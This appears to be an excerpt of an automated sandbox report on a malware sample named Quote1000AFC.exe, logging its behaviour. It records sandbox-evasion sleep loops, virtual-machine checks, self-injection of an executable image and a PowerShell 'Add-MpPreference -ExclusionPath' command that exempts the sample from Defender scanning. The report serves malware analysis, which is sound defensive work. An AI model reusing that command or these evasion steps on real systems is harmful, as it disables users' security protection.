                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: Quote1000AFC.exe PID: 4032, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: 93B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: 7BD0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: A3B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: B3B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: 17D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: 5110000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6160Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3260Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeWindow / User API: threadDelayed 2510Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeWindow / User API: threadDelayed 7303Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4452Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4280Thread sleep count: 2510 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep count: 32 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -99880s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4280Thread sleep count: 7303 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -99656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -99547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -99437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -99328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -99218s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -99106s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -98991s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -98826s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -98507s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -98312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -98200s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -98093s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97982s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -97000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96672s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -96015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95797s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95469s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95359s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95250s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95140s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -95031s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94922s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94812s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94702s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94592s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94482s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94375s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94265s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94156s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -94047s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exe TID: 4496Thread sleep time: -93937s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 99880Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 99547Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 99328Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 99218Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 99106Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 98991Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 98826Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 98507Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 98312Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 98200Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 98093Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97982Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97875Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97765Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97656Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97547Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97437Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97328Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97219Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97109Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 97000Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96890Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96781Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96672Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96562Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96453Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96343Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96234Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96125Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 96015Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95906Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95797Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95687Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95578Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95469Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95359Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95250Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95140Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 95031Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94922Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94812Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94702Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94592Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94482Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94375Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94265Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94156Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 94047Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeThread delayed: delay time: 93937Jump to behavior
                        Source: Quote1000AFC.exe, 00000004.00000002.2700959081.0000000001359000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                        Source: Quote1000AFC.exe, 00000000.00000002.1472891552.0000000000FF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe"
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMemory written: C:\Users\user\Desktop\Quote1000AFC.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess created: C:\Users\user\Desktop\Quote1000AFC.exe "C:\Users\user\Desktop\Quote1000AFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Users\user\Desktop\Quote1000AFC.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
